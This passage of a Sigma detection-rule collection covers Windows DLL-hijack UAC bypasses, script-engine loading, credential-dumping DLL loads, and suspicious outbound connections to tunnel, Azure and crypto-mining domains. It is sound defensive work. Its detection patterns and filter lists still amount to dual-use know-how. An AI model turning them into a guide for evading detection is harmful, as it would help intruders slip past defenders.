    "content": "title: UAC Bypass Using Iscsicpl - ImageLoad\nid: 9ed5959a-c43c-4c59-84e3-d28628429456\nstatus: test\ndescription: Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%\nreferences:\n    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n    - https://twitter.com/wdormann/status/1547583317410607110\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-17\nmodified: 2022-07-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image: C:\\Windows\\SysWOW64\\iscsicpl.exe\n        ImageLoaded|endswith: '\\iscsiexe.dll'\n    filter:\n        ImageLoaded|contains|all:\n            - 'C:\\Windows\\'\n            - 'iscsiexe.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_uac_bypass_via_dism.yml",
    "content": "title: UAC Bypass With Fake DLL\nid: a5ea83a7-05a5-44c1-be2e-addccbbd8c03\nstatus: test\ndescription: Attempts to load dismcore.dll after dropping it\nreferences:\n    - https://steemit.com/utopian-io/@ah101/uac-bypassing-utility\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-06\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dism.exe'\n        ImageLoaded|endswith: '\\dismcore.dll'\n    filter:\n        ImageLoaded: 'C:\\Windows\\System32\\Dism\\dismcore.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Actions of a legitimate telnet client\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml",
    "content": "title: MMC Loading Script Engines DLLs\nid: a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad\nstatus: experimental\ndescription: |\n    Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt\n    to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\n    - https://www.elastic.co/security-labs/grimresource\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.005\n    - attack.t1218.014\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\mmc.exe'\n        ImageLoaded|endswith:\n            - '\\vbscript.dll'\n            - '\\jscript.dll'\n            - '\\jscript9.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate MMC operations or extensions loading these libraries\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load.yml",
    "content": "title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location\nid: 416bc4a2-7217-4519-8dc7-c3271817f1d5\nrelated:\n    - id: 9f5c1d59-33be-4e60-bcab-85d2f566effd\n      type: similar\nstatus: experimental\ndescription: |\n    Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.\n    These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.\nreferences:\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\nmodified: 2026-01-09\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - '\\$Recycle.Bin\\'\n            - '\\Contacts\\'\n            # - '\\Desktop\\'\n            - '\\Documents\\'\n            # - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            #  - '\\AppData\\Local\\Temp\\' some installers may load from here\n    selection_dll:\n        ImageLoaded|endswith:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_trusted_path_bypass.yml",
    "content": "title: Trusted Path Bypass via Windows Directory Spoofing\nid: 0cbe38c0-270c-41d9-ab79-6e5a9a669290\nrelated:\n    - id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g \"C:\\Windows \\System32\") which can bypass Windows trusted path verification.\n    This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.\nreferences:\n    - https://x.com/Wietze/status/1933495426952421843\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.007\n    - attack.t1548.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - ':\\Windows \\System32\\'  # Note the space between \"Windows\" and \"System32\"\n            - ':\\Windows \\SysWOW64\\'  # Note the space between \"Windows\" and \"SysWOW64\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml",
    "content": "title: WMI Persistence - Command Line Event Consumer\nid: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6\nstatus: test\ndescription: Detects WMI command line event consumers\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.t1546.003\n    - attack.persistence\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        ImageLoaded|endswith: '\\wbemcons.dll'\n    condition: selection\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml",
    "content": "title: WMIC Loading Scripting Libraries\nid: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\nrelated:\n    - id: 8d63dadf-b91b-4187-87b6-34a1114577ea\n      type: similar\n    - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n      type: similar\nstatus: test\ndescription: |\n    Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).\n    It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.\nreferences:\n    - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html\n    - https://twitter.com/dez_/status/986614411711442944\n    - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-17\nmodified: 2022-10-13\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wmic.exe'\n        ImageLoaded|endswith:\n            - '\\jscript.dll'\n            - '\\vbscript.dll'\n    condition: selection\nfalsepositives:\n    - The command wmic os get lastbootuptime loads vbscript.dll\n    - The command wmic os get locale loads vbscript.dll\n    - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights\n    - The command `wmic ntevent` loads vbscript.dll\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: Wmiprvse Wbemcomn DLL Hijack\nid: 7707a579-e0d8-4886-a853-ce47e4575aaa\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\wmiprvse.exe'\n        ImageLoaded|endswith: '\\wbem\\wbemcomn.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wsman_provider_image_load.yml",
    "content": "title: Suspicious WSMAN Provider Image Loads\nid: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94\nstatus: test\ndescription: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.\nreferences:\n    - https://twitter.com/chadtilbury/status/1275851297770610688\n    - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\n    - https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture\n    - https://github.com/bohops/WSMan-WinRM\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-24\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    request_client:\n        - ImageLoaded|endswith:\n              - '\\WsmSvc.dll'\n              - '\\WsmAuto.dll'\n              - '\\Microsoft.WSMan.Management.ni.dll'\n        - OriginalFileName:\n              - 'WsmSvc.dll'\n              - 'WSMANAUTOMATION.DLL'\n              - 'Microsoft.WSMan.Management.dll'\n    respond_server:\n        Image|endswith: '\\svchost.exe'\n        OriginalFileName: 'WsmWmiPl.dll'\n    filter_general:\n        Image:\n            - 'C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe'\n            - 'C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\6\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\services.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_svchost: # not available in Sysmon data, but Aurora logs\n        CommandLine|contains:\n            - 'svchost.exe -k netsvcs -p -s BITS'\n            - 'svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc'\n            - 'svchost.exe -k NetworkService -p -s Wecsvc'\n            - 'svchost.exe -k netsvcs'\n    filter_mscorsvw: # Image: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\n        Image|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v'\n        Image|endswith: '\\mscorsvw.exe'\n    filter_svr_2019:\n        Image:\n            - 'C:\\Windows\\System32\\Configure-SMRemoting.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n    filter_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n    filter_citrix:\n        Image|startswith: 'C:\\Program Files\\Citrix\\'\n    filter_upgrade:\n        Image|startswith: 'C:\\$WINDOWS.~BT\\Sources\\'\n    filter_mmc:\n        Image|endswith: '\\mmc.exe'\n    svchost:\n        Image|endswith: '\\svchost.exe'\n    commandline_null:\n        CommandLine: null\n    condition: ( request_client or respond_server ) and not 1 of filter* and not ( svchost and commandline_null )\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_addinutil_initiated.yml",
    "content": "title: Network Connection Initiated By AddinUtil.EXE\nid: 5205613d-2a63-4412-a895-3a2458b587b3\nstatus: test\ndescription: |\n    Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\n    This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\addinutil.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml",
    "content": "title: Uncommon Connection to Active Directory Web Services\nid: b3ad3c0f-c949-47a1-a30e-b0491ccae876\nstatus: test\ndescription: |\n    Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.\nreferences:\n    - https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c\n    - https://github.com/FalconForceTeam/FalconFriday/blob/a9219dfcfd89836f34660223f47d766982bdce46/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nauthor: '@kostastsale'\ndate: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1087\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: true\n        DestinationPort: 9389\n    filter_main_dsac:\n        Image: 'C:\\Windows\\system32\\dsac.exe'\n    filter_main_ms_monitoring_agent:\n        Image: 'C:\\Program Files\\Microsoft Monitoring Agent\\'\n    filter_main_powershell:\n        Image|startswith:\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml",
    "content": "title: Uncommon Network Connection Initiated By Certutil.EXE\nid: 0dba975d-a193-4ed1-a067-424df57570d1\nstatus: test\ndescription: |\n    Detects a network connection initiated by the certutil.exe utility.\n    Attackers can abuse the utility in order to download malware or additional payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-09-02\nmodified: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\certutil.exe'\n        Initiated: 'true'\n        DestinationPort:\n            - 80\n            - 135\n            - 443\n            - 445\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Cmstp.EXE\nid: efafe0bf-4238-479e-af8f-797bd3490d2d\nstatus: test\ndescription: |\n    Detects a network connection initiated by Cmstp.EXE\n    Its uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\nmodified: 2024-05-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmstp.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\n# Note: Please report any false positive seen in the wild to help tune the rule.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Microsoft Dialer\nid: 37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1\nstatus: test\ndescription: |\n    Detects outbound network connection initiated by Microsoft Dialer.\n    The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\n    This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is \"Rhadamanthys\"\nreferences:\n    - https://tria.ge/240301-rk34sagf5x/behavioral2\n    - https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d\n    - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n    - https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html\nauthor: CertainlyP\ndate: 2024-04-26\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: ':\\Windows\\System32\\dialer.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml",
    "content": "title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process\nid: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83\nrelated:\n    - id: e043f529-8514-4205-8ab0-7f7d2927b400\n      type: derived\nstatus: test\ndescription: |\n    Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\nreferences:\n    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\n    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\nmodified: 2024-07-16\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1102.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: 'azurewebsites.net'\n    # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations\n    # Note: To avoid complex conditions the filters for some apps are generic by name only. A custom tuning is recommended for best results\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_chrome_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_firefox_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_safari:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\Safari\\'\n            - 'C:\\Program Files\\Safari\\'\n        Image|endswith: '\\safari.exe'\n    filter_main_defender:\n        Image|contains:\n            - 'C:\\Program Files\\Windows Defender Advanced Threat Protection\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_main_prtg:\n        # Paessler's PRTG Network Monitor\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n            - 'C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe'\n    filter_main_brave:\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n        Image|endswith: '\\brave.exe'\n    filter_main_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_main_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_main_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    # Note: The TOR browser shouldn't be something you allow in your corporate network.\n    # filter_main_tor:\n    #     Image|contains: '\\Tor Browser\\'\n    filter_main_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_main_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_main_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_main_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_main_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_main_qtweb:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\QtWeb\\'\n            - 'C:\\Program Files\\QtWeb\\'\n        Image|endswith: '\\QtWeb.exe'\n    filter_main_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    filter_main_discord:\n        Image|contains: '\\AppData\\Local\\Discord\\'\n        Image|endswith: '\\Discord.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    # filter_optional_qlik:\n    #     Image|endswith: '\\Engine.exe' # Process from qlik.com app\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_btunnels.yml",
    "content": "title: Network Connection Initiated To BTunnels Domains\nid: 9e02c8ec-02b9-43e8-81eb-34a475ba7965\nstatus: test\ndescription: |\n    Detects network connections to BTunnels domains initiated by a process on the system.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/\nauthor: Kamran Saifullah\ndate: 2024-09-13\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.btunnel.co.in'\n    condition: selection\nfalsepositives:\n    - Legitimate use of BTunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml",
    "content": "title: Network Connection Initiated To Cloudflared Tunnels Domains\nid: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903\nrelated:\n    - id: a1d9eec5-33b2-4177-8d24-27fe754d0812\n      type: derived\nstatus: test\ndescription: |\n    Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - Internal Research\nauthor: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-05-27\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.v2.argotunnel.com'\n            - 'protocol-v2.argotunnel.com'\n            - 'trycloudflare.com'\n            - 'update.argotunnel.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of cloudflare tunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml",
    "content": "title: Network Communication With Crypto Mining Pool\nid: fa5b1358-b040-4403-9868-15f7d9ab6329\nstatus: stable\ndescription: Detects initiated network connections to crypto mining pools\nreferences:\n    - https://www.poolwatch.io/coin/monero\n    - https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt\n    - https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-10-26\nmodified: 2024-01-19\ntags:\n    - attack.impact\n    - attack.t1496\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname:\n            - 'alimabi.cn'\n            - 'ap.luckpool.net'\n            - 'bcn.pool.minergate.com'\n            - 'bcn.vip.pool.minergate.com'\n            - 'bohemianpool.com'\n            - 'ca-aipg.miningocean.org'\n            - 'ca-dynex.miningocean.org'\n            - 'ca-neurai.miningocean.org'\n            - 'ca-qrl.miningocean.org'\n            - 'ca-upx.miningocean.org'\n            - 'ca-zephyr.miningocean.org'\n            - 'ca.minexmr.com'\n            - 'ca.monero.herominers.com'\n            - 'cbd.monerpool.org'\n            - 'cbdv2.monerpool.org'\n            - 'cryptmonero.com'\n            - 'crypto-pool.fr'\n            - 'crypto-pool.info'\n            - 'cryptonight-hub.miningpoolhub.com'\n            - 'd1pool.ddns.net'\n            - 'd5pool.us'\n            - 'daili01.monerpool.org'\n            - 'de-aipg.miningocean.org'\n            - 'de-dynex.miningocean.org'\n            - 'de-zephyr.miningocean.org'\n            - 'de.minexmr.com'\n            - 'dl.nbminer.com'\n            - 'donate.graef.in'\n            - 'donate.ssl.xmrig.com'\n            - 'donate.v2.xmrig.com'\n            - 'donate.xmrig.com'\n            - 'donate2.graef.in'\n            - 'drill.moneroworld.com'\n            - 'dwarfpool.com'\n            - 'emercoin.com'\n            - 'emercoin.net'\n            - 'emergate.net'\n            - 'ethereumpool.co'\n            - 'eu.luckpool.net'\n            - 'eu.minerpool.pw'\n            - 'fcn-xmr.pool.minergate.com'\n            - 'fee.xmrig.com'\n            - 'fr-aipg.miningocean.org'\n            - 'fr-dynex.miningocean.org'\n            - 'fr-neurai.miningocean.org'\n            - 'fr-qrl.miningocean.org'\n            - 